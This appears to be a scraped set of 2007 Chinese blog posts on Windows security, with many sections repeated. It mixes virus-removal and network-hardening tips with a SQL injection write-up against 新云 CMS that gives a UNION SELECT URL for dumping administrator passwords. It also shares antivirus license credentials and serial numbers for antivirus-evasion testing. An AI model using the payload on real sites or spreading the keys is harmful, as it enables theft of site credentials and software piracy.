1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消灭。
2、停止有问题的服务,改自动为禁止。
3、如果文件system32driversetchosts被篡改,恢复它,即只剩下一行有效值“127.0.0.1localhost”,其余的行删除。再把host设置成只读。
4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows升级打补丁和对杀毒软件升级。
5、搜索病毒的执行文件,手动消灭之。
6、对Windows升级打补丁和对杀毒软件升级。
7、关闭不必要的系统服务,如remoteregistryservice。
8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。
9、上步完成后,重启计算机,完成所有操作。
还有另一种查毒的方法:
启动好后 什也不要打开 在“开始——运行——cmd——netstat -a -n -o ”,看看有什么进程在通信 那个进程90%就是病毒或木马了
一系统安装多杀毒软件
[ 2007-03-25 03:50:20 | 作者: sun ]
本来、打算做教程了,一想做教程不好发表,所以就写了这个,希望对大家有帮助
前几天为了做免杀的需要,所以得安几个杀毒软件
目前比较流行的也就是江民,瑞星,金山,卡巴,这四个,其他的感觉都不怎么
地,所以不考虑了,不过在安装的时候出现了一个问题,就是都装上重起电脑之后
江民的语言选择里面没有简体中文了,这个挺郁闷的,不过最郁闷的还在后面,拨
号上网后,QQ上不去,网页打不开,PING也不通,用netstat命令查看网络状态一
看,竟然所有端口的连接都不正常,这可郁闷坏我了,重新做一次系统,多个心眼
用GHOST做个备份(以前的也有备份,不过系统里装的东西过时了```)然后试了拨
号,一切都正常,呵呵,这回先到网上查查看有没有相关的资料,当然是百度了,
不过什么也没有找到,没这方面的问题介绍,郁闷中……
没办法,自己琢磨了,我们GO ON吧,这回一个一个装,装了江民,没问题,
又装了卡巴,也没问题,又装金山,晕,出问题了````,还是老问题,上不去网了
没办法,用GHOST恢复系统吧,接下来试的就别提了,试了3个多小时,最后下定了
结论,是金山的问题,思考一下,到底是什么问题呢,莫非系统文件冲突,那么就
少装一些项目,装的时候少选几项试试,又用了1个多小时,问题终于找到了`````
原来是金山网标的问题,一想想,肯定是金山网标与其他的杀毒软件防火墙有冲突
问题找到了,这回可以好好装了,恢复系统,装杀毒软件,终于行了~~~太兴奋了`
终于成功了```下面就给大家写一下关与安装多个杀毒软件的方法吧,首先必须
说明的是,安装完一个杀毒软件之后必须设置开机禁止启动,因为如果电脑开机启
动多个杀毒软件会很卡的,而且有时候反应很慢,更严重的是会引起系统蓝屏或崩溃
建议大家最后装卡巴,为什么?自己试试就知道了````。
江民的设置:打开主程序(KV2006),点操作台切换,恢复窗口,工具→设置→
实时监控,把所有开机启动的项目全部去掉,确定。
瑞星的设置:打开主程序(瑞星杀毒软件),设置→详细设置→瑞星监控中心,
把所有开机启动的项目去掉,确定。
金山的设置:打开主程序(金山毒霸2006),工具→综合设置→防毒设置→用户
自定义→文件实时防毒/邮件监控/网页安全扫描(把启动的项目的钩去掉)确定。
在这里要说明一点,在文件实时防毒的页面,把发现病毒时的处理方式改为禁止访问
该文件,否则你的黑软会一下子全没了```我以前就知道,不过我朋友前一段时间就
忘了,结果可想而知了```害得他整整郁闷了一个星期~。
卡巴的设置:打开主程序(版本很多,主程序名我也不好说),设置→接下来的
自己找吧,版本太多了,每个都不一样```我也说不清楚。
当然你要想机器平时用的方便,设置更多了,比如江民,瑞星,金山都有自带的
小精灵,小护士,助手什么的,最好别让他们工作,很讨厌(这个词不光女孩子能用
哦,嘿嘿~)。
接下来要提醒大家,如果是搞黑客技术的,最好用GHOST多做几个备份(什么?
不会用GHOST?往下看吧),因为用的软件多了装的太多机器肯定很卡的,这点大家
应该有同感~
至于GHOST的用法(最好自己去网上查,说的比较详细),如果大家不会用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,适合对DOS不太了解的人`
这里说明大家安装江民后出现的一个严重问题,就是每次开机都扫描硬盘,我看
过网上对这方面的介绍,都不全,而且有一点没有说到,在这里说一下,解决方法是
打开江民的设置选项→扫描选项→其他动作,把四个项目的钩都去掉(每个选项的作
用大家都能读明白吧,我就不详细说了),然后确定,之后打开注册表(单击“开始
→运行”,在“运行”对话框中输入“regedit”打开注册表编辑器)依次选择
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右侧窗口中找到“BootExecute”键值项,右键选择修改,里面数值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后点确定,F5刷新就可以了,以后就不会启动江民自带的开机
扫描了。
大家知道电脑非正常关机的情况下重起电脑以后也会开机扫描,这是很正常的,如果
以后永远不想让电脑开机扫描就把里面的数值全部清空,确定,F5刷新,就可以了
不过建议大家先备份一下注册表再清空里面的数据(因为如果电脑经常非正常关机而
且不开机扫描硬盘,那么会造成硬盘数据破坏后无法删除!),不过清空了也没关系
我们可以用chkdsk命令来强迫电脑开机扫描硬盘,至于chkdsk命令的用法大家就到网
上自己查吧。
最后就是免费升级杀毒软件了
江民:通行证帐号:sphack 密码:sphack 密码改了我也能找回来,因为我知道
用的人多了,升级次数多了,自然就不能升级了,建议大家2天升级一次吧,还有就是
我会陆续更新新的江民通行证,请留意http://www.sphack.cn,谢谢大家支持。
瑞星:序列号: T1BULQ-70AWDE-9P90SF-7TD200?用户ID:RB2NA22T
注意大家千万别点自动升级,因为点自动升级之后就不能用了,大家用瑞星升级保姆
吧,这个保姆是随时更新的,保证用户可以免费升级~下载地址请关注天天杀毒网
http://www.sdday.com,这里有你想要的东东,看了绝对不后悔~
金山:天天杀毒网有破解版的金山2006,如果想用正版的,需要通行证和密码,
不过由于本通行证不随便对外公开,所以暂时不提供。
卡巴:这个好弄,网上到处都有下载,而且有序列号,不过建议大家到天天杀毒网
去下载,因为那里保证下载的东东没问题(现在网络可不安全,危险随时都在),声明
啊,我可不是给天天杀毒网做广告,他可不给我任何好处,只是感觉这个网站有用的东
西太多了。。。
最后给计算机/网络技术初学者一句话,就是遇到问题的时候别总想着去问别人,
自己养成用搜索引擎找答案的习惯,曾经我记得黑客基地的一个VIP会员说过,百度是
你最好的老师~每当我遇到问题的时候,总会想起这句话。
好了,就写这么多吧,打字打的手都酸了,GOOD LUCK !
前几天为了做免杀的需要,所以得安几个杀毒软件
目前比较流行的也就是江民,瑞星,金山,卡巴,这四个,其他的感觉都不怎么
地,所以不考虑了,不过在安装的时候出现了一个问题,就是都装上重起电脑之后
江民的语言选择里面没有简体中文了,这个挺郁闷的,不过最郁闷的还在后面,拨
号上网后,QQ上不去,网页打不开,PING也不通,用netstat命令查看网络状态一
看,竟然所有端口的连接都不正常,这可郁闷坏我了,重新做一次系统,多个心眼
用GHOST做个备份(以前的也有备份,不过系统里装的东西过时了```)然后试了拨
号,一切都正常,呵呵,这回先到网上查查看有没有相关的资料,当然是百度了,
不过什么也没有找到,没这方面的问题介绍,郁闷中……
没办法,自己琢磨了,我们GO ON吧,这回一个一个装,装了江民,没问题,
又装了卡巴,也没问题,又装金山,晕,出问题了````,还是老问题,上不去网了
没办法,用GHOST恢复系统吧,接下来试的就别提了,试了3个多小时,最后下定了
结论,是金山的问题,思考一下,到底是什么问题呢,莫非系统文件冲突,那么就
少装一些项目,装的时候少选几项试试,又用了1个多小时,问题终于找到了`````
原来是金山网标的问题,一想想,肯定是金山网标与其他的杀毒软件防火墙有冲突
问题找到了,这回可以好好装了,恢复系统,装杀毒软件,终于行了~~~太兴奋了`
终于成功了```下面就给大家写一下关与安装多个杀毒软件的方法吧,首先必须
说明的是,安装完一个杀毒软件之后必须设置开机禁止启动,因为如果电脑开机启
动多个杀毒软件会很卡的,而且有时候反应很慢,更严重的是会引起系统蓝屏或崩溃
建议大家最后装卡巴,为什么?自己试试就知道了````。
江民的设置:打开主程序(KV2006),点操作台切换,恢复窗口,工具→设置→
实时监控,把所有开机启动的项目全部去掉,确定。
瑞星的设置:打开主程序(瑞星杀毒软件),设置→详细设置→瑞星监控中心,
把所有开机启动的项目去掉,确定。
金山的设置:打开主程序(金山毒霸2006),工具→综合设置→防毒设置→用户
自定义→文件实时防毒/邮件监控/网页安全扫描(把启动的项目的钩去掉)确定。
在这里要说明一点,在文件实时防毒的页面,把发现病毒时的处理方式改为禁止访问
该文件,否则你的黑软会一下子全没了```我以前就知道,不过我朋友前一段时间就
忘了,结果可想而知了```害得他整整郁闷了一个星期~。
卡巴的设置:打开主程序(版本很多,主程序名我也不好说),设置→接下来的
自己找吧,版本太多了,每个都不一样```我也说不清楚。
当然你要想机器平时用的方便,设置更多了,比如江民,瑞星,金山都有自带的
小精灵,小护士,助手什么的,最好别让他们工作,很讨厌(这个词不光女孩子能用
哦,嘿嘿~)。
接下来要提醒大家,如果是搞黑客技术的,最好用GHOST多做几个备份(什么?
不会用GHOST?往下看吧),因为用的软件多了装的太多机器肯定很卡的,这点大家
应该有同感~
至于GHOST的用法(最好自己去网上查,说的比较详细),如果大家不会用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,适合对DOS不太了解的人`
这里说明大家安装江民后出现的一个严重问题,就是每次开机都扫描硬盘,我看
过网上对这方面的介绍,都不全,而且有一点没有说到,在这里说一下,解决方法是
打开江民的设置选项→扫描选项→其他动作,把四个项目的钩都去掉(每个选项的作
用大家都能读明白吧,我就不详细说了),然后确定,之后打开注册表(单击“开始
→运行”,在“运行”对话框中输入“regedit”打开注册表编辑器)依次选择
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右侧窗口中找到“BootExecute”键值项,右键选择修改,里面数值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后点确定,F5刷新就可以了,以后就不会启动江民自带的开机
扫描了。
大家知道电脑非正常关机的情况下重起电脑以后也会开机扫描,这是很正常的,如果
以后永远不想让电脑开机扫描就把里面的数值全部清空,确定,F5刷新,就可以了
不过建议大家先备份一下注册表再清空里面的数据(因为如果电脑经常非正常关机而
且不开机扫描硬盘,那么会造成硬盘数据破坏后无法删除!),不过清空了也没关系
我们可以用chkdsk命令来强迫电脑开机扫描硬盘,至于chkdsk命令的用法大家就到网
上自己查吧。
最后就是免费升级杀毒软件了
江民:通行证帐号:sphack 密码:sphack 密码改了我也能找回来,因为我知道
用的人多了,升级次数多了,自然就不能升级了,建议大家2天升级一次吧,还有就是
我会陆续更新新的江民通行证,请留意http://www.sphack.cn,谢谢大家支持。
瑞星:序列号: T1BULQ-70AWDE-9P90SF-7TD200?用户ID:RB2NA22T
注意大家千万别点自动升级,因为点自动升级之后就不能用了,大家用瑞星升级保姆
吧,这个保姆是随时更新的,保证用户可以免费升级~下载地址请关注天天杀毒网
http://www.sdday.com,这里有你想要的东东,看了绝对不后悔~
金山:天天杀毒网有破解版的金山2006,如果想用正版的,需要通行证和密码,
不过由于本通行证不随便对外公开,所以暂时不提供。
卡巴:这个好弄,网上到处都有下载,而且有序列号,不过建议大家到天天杀毒网
去下载,因为那里保证下载的东东没问题(现在网络可不安全,危险随时都在),声明
啊,我可不是给天天杀毒网做广告,他可不给我任何好处,只是感觉这个网站有用的东
西太多了。。。
最后给计算机/网络技术初学者一句话,就是遇到问题的时候别总想着去问别人,
自己养成用搜索引擎找答案的习惯,曾经我记得黑客基地的一个VIP会员说过,百度是
你最好的老师~每当我遇到问题的时候,总会想起这句话。
好了,就写这么多吧,打字打的手都酸了,GOOD LUCK !
举凡一般企业当中,除了一些提供网络服务的服务器外,更多数的是一般工作站或可移动的笔记型计算机,亦因其数量远远多过于服务器主机,IT人员可以考虑制定标准的工作站安全政策,利用一些安全设定与保护机制来管理这些有潜在风险的工作站。
我们因着过去的一些经验,提供了一些方向给IT人员参考。
实体的安全
设定使用者授权机制:在企业的网络环境里,可以设定唯有授权的使用者,方可使用企业内部的工作站主机,另外,亦提醒使用者可以启动屏幕保护程序限制未被授权的人无法使用,以保护工作站中所存放的数据。
设定适当的存取控制权限:对于计算机中机密或重要的档案/目录进行权限控制,非授权的使用者无法读取重要的档案,或者亦可考虑利用密码保护功能进行控制。
制定计算机硬件的安装机制:可移动式的储存设备愈来愈普遍化,但随着愈方便地使用亦愈容易成为漏洞的所在,IT人员可以考虑制定硬件管理的机制。
系统的安全设定
重视软件相关的安全修补程序:注意软件开发厂商提供的修补程序,并确实执行修补作业。
安装防毒软件并定期更新病毒码及引击:利用防毒软件进行病毒的防护机制,并确实更新程序,以达到有效的预防。
远程管理的安全性:远程管理工具提供给IT人员一个便利的管道来管理企业中的计算机,但可能一不小心便成为黑客的后门,IT人员需特别注意。
减少不必要的应用程序:这点是老生常谈了,在工作站上只要有不必要的应用程序,就将它移除或停止启动。
数据的保护
定期执行备份工作:工作站上重要的档案需定期执行备份或者将档案备份到企业的档案伺服主机。
知识的传达
提升使用者对安全的认知:因为并非每个使用者都有IT人员的专业资安概念,所以,IT人员可善用一些机会,给予一般使用者信息安全的认知与概念。
善用工作站管理程序,统一管理企业计算机软硬件:对于IT人员,可以善用管理程序来管理企业内部的软硬件,找出是否有工作站安装了未经授权的软件,或执行不安全的软件。
不随意下载或执行来源不明的档案或程序:提醒每个使用者不要执行来路不明的程序,减少一些资安上的风险。
透过 DragonSoft Secure Scanner(DSS) 检查您企业中的工作站是否安装或启动哪些未经授权的软件。
进行一个安全检测,并采用"一般检测"政策,检测目标选择您欲检查的主机,您可以分不同部门来进行检测作业,届时针对不同部门给予建议等。
按下工具列上的开始按钮进行检测。
检测完成后,按下工具列上的报表按钮,进行报表产生。
报表产生后,其中一部份就是记录着被检测主机上的服务信息,依着报告您即可提醒公司内部人员,进行修正,以符合公司所订定的安全政策。
我们因着过去的一些经验,提供了一些方向给IT人员参考。
实体的安全
设定使用者授权机制:在企业的网络环境里,可以设定唯有授权的使用者,方可使用企业内部的工作站主机,另外,亦提醒使用者可以启动屏幕保护程序限制未被授权的人无法使用,以保护工作站中所存放的数据。
设定适当的存取控制权限:对于计算机中机密或重要的档案/目录进行权限控制,非授权的使用者无法读取重要的档案,或者亦可考虑利用密码保护功能进行控制。
制定计算机硬件的安装机制:可移动式的储存设备愈来愈普遍化,但随着愈方便地使用亦愈容易成为漏洞的所在,IT人员可以考虑制定硬件管理的机制。
系统的安全设定
重视软件相关的安全修补程序:注意软件开发厂商提供的修补程序,并确实执行修补作业。
安装防毒软件并定期更新病毒码及引击:利用防毒软件进行病毒的防护机制,并确实更新程序,以达到有效的预防。
远程管理的安全性:远程管理工具提供给IT人员一个便利的管道来管理企业中的计算机,但可能一不小心便成为黑客的后门,IT人员需特别注意。
减少不必要的应用程序:这点是老生常谈了,在工作站上只要有不必要的应用程序,就将它移除或停止启动。
数据的保护
定期执行备份工作:工作站上重要的档案需定期执行备份或者将档案备份到企业的档案伺服主机。
知识的传达
提升使用者对安全的认知:因为并非每个使用者都有IT人员的专业资安概念,所以,IT人员可善用一些机会,给予一般使用者信息安全的认知与概念。
善用工作站管理程序,统一管理企业计算机软硬件:对于IT人员,可以善用管理程序来管理企业内部的软硬件,找出是否有工作站安装了未经授权的软件,或执行不安全的软件。
不随意下载或执行来源不明的档案或程序:提醒每个使用者不要执行来路不明的程序,减少一些资安上的风险。
透过 DragonSoft Secure Scanner(DSS) 检查您企业中的工作站是否安装或启动哪些未经授权的软件。
进行一个安全检测,并采用"一般检测"政策,检测目标选择您欲检查的主机,您可以分不同部门来进行检测作业,届时针对不同部门给予建议等。
按下工具列上的开始按钮进行检测。
检测完成后,按下工具列上的报表按钮,进行报表产生。
报表产生后,其中一部份就是记录着被检测主机上的服务信息,依着报告您即可提醒公司内部人员,进行修正,以符合公司所订定的安全政策。
新云网站管理系统文件注入漏洞
[ 2007-03-25 03:49:51 | 作者: sun ]
关于新云
新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。
漏洞原理
利用各种方法实现入侵,如COOKIES、抓包、注入检测等。
1.过滤未全
user\articlepost.asp 文件第333行
Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入,就可以爆出管理员的表和代码。
2.新云2.1SQL版注入漏洞
漏洞描述:
动画频道的“动画管理”和“审核管理”,错误类型:
Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存储过程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺骗获取管理账号
攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。
新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。
漏洞原理
利用各种方法实现入侵,如COOKIES、抓包、注入检测等。
1.过滤未全
user\articlepost.asp 文件第333行
Quote
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
username=’" & Newasp.MemberName & "’
And ArticleID=" & Request("ArticleID")
没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:
articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin
注册后直接在浏览器上输入,就可以爆出管理员的表和代码。
2.新云2.1SQL版注入漏洞
漏洞描述:
动画频道的“动画管理”和“审核管理”,错误类型:
Quote
Microsoft OLE DB Provider for SQL Server (0x80040E14)
未能找到存储过程 ’NC_FlashAdminList’。
/admin/admin_Flash.asp, 第 233 行
可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:
articlepost.asp?ChannelID=1&action=view&ArticleID=1;--
3.COOKIES欺骗获取管理账号
攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。
避免网络IP地址被非法修改
[ 2007-03-25 03:49:39 | 作者: sun ]
局域网中各工作站的TCP/IP参数被随意修改后,很容易造成IP地址的冲突,这会给管理工作带来不小的麻烦。那么,有没有办法保护好自己的网络,不让别人非法修改IP地址呢?
其实,很简单,你只要参照下面的步骤,就能轻松避免IP地址被非法修改的麻烦!
注册表设置法
首先,需要将桌面上的“网上邻居”图标隐藏起来,让其他人无法通过“网上邻居”属性窗口,进入到TCP/IP参数设置界面。依次展开注册表编辑窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子键,然后在“Explorer”子键下面,创建一名为“NoNetHood”双字节值,并将它设置为“1”,就可以了。
其次,再将控制面板窗口中的“网络”图标,隐藏起来,那么其他人根本就打不开TCP/IP参数设置界面了。只要你打开“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]处,输入一行形如“netcpl.cpl=no”的代码,重新保存后,“网络”图标就从控制面板窗口中消失了。
到了这里,所有可以修改IP的途径都被“切断”了,这样其他人即使想修改IP地址,也无处下手了。当然,这种方法只能蒙蒙菜鸟网民,对于“大虾”级的网民来说,几乎就是聋子的耳朵——摆设。因为网民一旦找到“netcpl.cpl”文件,还是有办法恢复“网络”或“网上邻居”图标的,为此,你还需要进行下面的工作,才能真正意义上“切断”IP的修改通道:
依次展开注册表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子键,然后在“Network”子键下面,创建一个名为“NoNetSetup”的双字节值,并将它设置为“1”;之后,你再想打开“网上邻居”或“网络”属性窗口时,将会得到无权访问的提示。
局域网中各工作站的TCP/IP参数被随意修改后,很容易造成IP地址的冲突,这会给管理工作带来不小的麻烦。那么,有没有办法保护好自己的网络,不让别人非法修改IP地址呢?
其实,很简单,你只要参照下面的步骤,就能轻松避免IP地址被非法修改的麻烦!
注册表设置法
首先,需要将桌面上的“网上邻居”图标隐藏起来,让其他人无法通过“网上邻居”属性窗口,进入到TCP/IP参数设置界面。依次展开注册表编辑窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子键,然后在“Explorer”子键下面,创建一名为“NoNetHood”双字节值,并将它设置为“1”,就可以了。
其次,再将控制面板窗口中的“网络”图标,隐藏起来,那么其他人根本就打不开TCP/IP参数设置界面了。只要你打开“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]处,输入一行形如“netcpl.cpl=no”的代码,重新保存后,“网络”图标就从控制面板窗口中消失了。
到了这里,所有可以修改IP的途径都被“切断”了,这样其他人即使想修改IP地址,也无处下手了。当然,这种方法只能蒙蒙菜鸟网民,对于“大虾”级的网民来说,几乎就是聋子的耳朵——摆设。因为网民一旦找到“netcpl.cpl”文件,还是有办法恢复“网络”或“网上邻居”图标的,为此,你还需要进行下面的工作,才能真正意义上“切断”IP的修改通道:
依次展开注册表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子键,然后在“Network”子键下面,创建一个名为“NoNetSetup”的双字节值,并将它设置为“1”;之后,你再想打开“网上邻居”或“网络”属性窗口时,将会得到无权访问的提示。
地址绑定法
除了通过切断修改IP的“通道”,来禁止其他人非法修改IP地址外,你也可以直接对指定IP地址,进行限制,让其他人即使修改了地址,也无法进行网络连接。在限制IP地址时,可以用地址绑定法来实现:
首先将系统切换到DOS命令行状态下,执行“ipconfig /all”命令,在弹出的窗口中,将网卡的MAC地址、IP地址记录下来;
下面在代理服务器端,将指定IP地址与对应的MAC地址,绑定在一起,以后即使有人在你的计算机中,修改了IP地址,他也无法通过代理服务器,进行网络连接。例如,在绑定前面的IP地址时,可以在DOS命令行中,执行“arp -s 10.168.160.10 00-30-6E-36-5A-EF”命令,就能将静态IP地址“10.168.160.10”和网卡的MAC地址“00-30-6E-36-5A-EF”绑定在一起了。
在局域网中,使用代理服务器上网的工作站,都能通过上述方法,来限制修改静态IP地址。要是日后需要为IP地址“松绑”的话,只要执行“arp -d 10.168.160.10 00-30-6E-36-5A-EF”命令就可以了。
要是你的局域网,使用的是三层交换机来连接各个工作站的话,那么你只需要在每一个交换端口处,对IP地址进行一下限定,让其他人即使修改了IP地址,也无法通过交换机上网。
其实,很简单,你只要参照下面的步骤,就能轻松避免IP地址被非法修改的麻烦!
注册表设置法
首先,需要将桌面上的“网上邻居”图标隐藏起来,让其他人无法通过“网上邻居”属性窗口,进入到TCP/IP参数设置界面。依次展开注册表编辑窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子键,然后在“Explorer”子键下面,创建一名为“NoNetHood”双字节值,并将它设置为“1”,就可以了。
其次,再将控制面板窗口中的“网络”图标,隐藏起来,那么其他人根本就打不开TCP/IP参数设置界面了。只要你打开“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]处,输入一行形如“netcpl.cpl=no”的代码,重新保存后,“网络”图标就从控制面板窗口中消失了。
到了这里,所有可以修改IP的途径都被“切断”了,这样其他人即使想修改IP地址,也无处下手了。当然,这种方法只能蒙蒙菜鸟网民,对于“大虾”级的网民来说,几乎就是聋子的耳朵——摆设。因为网民一旦找到“netcpl.cpl”文件,还是有办法恢复“网络”或“网上邻居”图标的,为此,你还需要进行下面的工作,才能真正意义上“切断”IP的修改通道:
依次展开注册表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子键,然后在“Network”子键下面,创建一个名为“NoNetSetup”的双字节值,并将它设置为“1”;之后,你再想打开“网上邻居”或“网络”属性窗口时,将会得到无权访问的提示。
局域网中各工作站的TCP/IP参数被随意修改后,很容易造成IP地址的冲突,这会给管理工作带来不小的麻烦。那么,有没有办法保护好自己的网络,不让别人非法修改IP地址呢?
其实,很简单,你只要参照下面的步骤,就能轻松避免IP地址被非法修改的麻烦!
注册表设置法
首先,需要将桌面上的“网上邻居”图标隐藏起来,让其他人无法通过“网上邻居”属性窗口,进入到TCP/IP参数设置界面。依次展开注册表编辑窗口中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“ Windows”、“CurrentVersion”、“Policies”、“Explorer”子键,然后在“Explorer”子键下面,创建一名为“NoNetHood”双字节值,并将它设置为“1”,就可以了。
其次,再将控制面板窗口中的“网络”图标,隐藏起来,那么其他人根本就打不开TCP/IP参数设置界面了。只要你打开“Windows/Sys_tem(去掉"_")/netcpl.cpl”文件,然后在[don"t load]处,输入一行形如“netcpl.cpl=no”的代码,重新保存后,“网络”图标就从控制面板窗口中消失了。
到了这里,所有可以修改IP的途径都被“切断”了,这样其他人即使想修改IP地址,也无处下手了。当然,这种方法只能蒙蒙菜鸟网民,对于“大虾”级的网民来说,几乎就是聋子的耳朵——摆设。因为网民一旦找到“netcpl.cpl”文件,还是有办法恢复“网络”或“网上邻居”图标的,为此,你还需要进行下面的工作,才能真正意义上“切断”IP的修改通道:
依次展开注册表中的“HKEY_CURRENT_USER”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Policies”、“Network”子键,然后在“Network”子键下面,创建一个名为“NoNetSetup”的双字节值,并将它设置为“1”;之后,你再想打开“网上邻居”或“网络”属性窗口时,将会得到无权访问的提示。
地址绑定法
除了通过切断修改IP的“通道”,来禁止其他人非法修改IP地址外,你也可以直接对指定IP地址,进行限制,让其他人即使修改了地址,也无法进行网络连接。在限制IP地址时,可以用地址绑定法来实现:
首先将系统切换到DOS命令行状态下,执行“ipconfig /all”命令,在弹出的窗口中,将网卡的MAC地址、IP地址记录下来;
下面在代理服务器端,将指定IP地址与对应的MAC地址,绑定在一起,以后即使有人在你的计算机中,修改了IP地址,他也无法通过代理服务器,进行网络连接。例如,在绑定前面的IP地址时,可以在DOS命令行中,执行“arp -s 10.168.160.10 00-30-6E-36-5A-EF”命令,就能将静态IP地址“10.168.160.10”和网卡的MAC地址“00-30-6E-36-5A-EF”绑定在一起了。
在局域网中,使用代理服务器上网的工作站,都能通过上述方法,来限制修改静态IP地址。要是日后需要为IP地址“松绑”的话,只要执行“arp -d 10.168.160.10 00-30-6E-36-5A-EF”命令就可以了。
要是你的局域网,使用的是三层交换机来连接各个工作站的话,那么你只需要在每一个交换端口处,对IP地址进行一下限定,让其他人即使修改了IP地址,也无法通过交换机上网。
系统安全防范之Windows日志与入侵检测
[ 2007-03-25 03:49:28 | 作者: sun ]
一、日志文件的特殊性
要了解日志文件,首先就要从它的特殊性讲起,说它特殊是因为这个文件由系统管理,并加以保护,一般情况下普通用户不能随意更改。我们不能用针对普通TXT文件的编辑方法来编辑它。例如WPS系列、Word系列、写字板、Edit等等,都奈何它不得。我们甚至不能对它进行“重命名”或“删除”、“移动”操作,否则系统就会很不客气告诉你:访问被拒绝。当然,在纯DOS的状态下,可以对它进行一些常规操作(例如Win98状态下),但是你很快就会发现,你的修改根本就无济于事,当重新启动Windows 98时,系统将会自动检查这个特殊的文本文件,若不存在就会自动产生一个;若存在的话,将向该文本追加日志记录。
二、黑客为什么会对日志文件感兴趣
黑客们在获得服务器的系统管理员权限之后就可以随意破坏系统上的文件了,包括日志文件。但是这一切都将被系统日志所记录下来,所以黑客们想要隐藏自己的入侵踪迹,就必须对日志进行修改。最简单的方法就是删除系统日志文件,但这样做一般都是初级黑客所为,真正的高级黑客们总是用修改日志的方法来防止系统管理员追踪到自己,网络上有很多专门进行此类功能的程序,例如Zap、Wipe等。
三、Windows系列日志系统简介
1.Windows 98的日志文件
因目前绝大多数的用户还是使用的操作系统是Windows 98,所以本节先从Windows 98的日志文件讲起。Windows 98下的普通用户无需使用系统日志,除非有特殊用途,例如,利用Windows 98建立个人Web服务器时,就会需要启用系统日志来作为服务器安全方面的参考,当已利用Windows 98建立个人Web服务器的用户,可以进行下列操作来启用日志功能。
(1)在“控制面板”中双击“个人Web服务器”图标;(必须已经在配置好相关的网络协议,并添加“个人Web服务器”的情况下)。
(2)在“管理”选项卡中单击“管理”按钮;
(3)在“Internet服务管理员”页中单击“WWW管理”;
(4)在“WWW管理”页中单击“日志”选项卡;
(5)选中“启用日志”复选框,并根据需要进行更改。 将日志文件命名为“Inetserver_event.log”。如果“日志”选项卡中没有指定日志文件的目录,则文件将被保存在Windows文件夹中。
普通用户可以在Windows 98的系统文件夹中找到日志文件schedlog.txt。我们可以通过以下几种方法找到它。在“开始”/“查找”中查找到它,或是启动“任务计划程序”,在“高级”菜单中单击“查看日志”来查看到它。Windows 98的普通用户的日志文件很简单,只是记录了一些预先设定的任务运行过程,相对于作为服务器的NT操作系统,真正的黑客们很少对Windows 98发生兴趣。所以Windows 98下的日志不为人们所重视。
2.Windows NT下的日志系统
Windows NT是目前受到攻击较多的操作系统,在Windows NT中,日志文件几乎对系统中的每一项事务都要做一定程度上的审计。Windows NT的日志文件一般分为三类:
系统日志 :跟踪各种各样的系统事件,记录由 Windows NT 的系统组件产生的事件。例如,在启动过程加载驱动程序错误或其它系统组件的失败记录在系统日志中。
应用程序日志:记录由应用程序或系统程序产生的事件,比如应用程序产生的装载dll(动态链接库)失败的信息将出现在日志中。
安全日志 :记录登录上网、下网、改变访问权限以及系统启动和关闭等事件以及与创建、打开或删除文件等资源使用相关联的事件。利用系统的“事件管理器”可以指定在安全日志中记录需要记录的事件,安全日志的默认状态是关闭的。
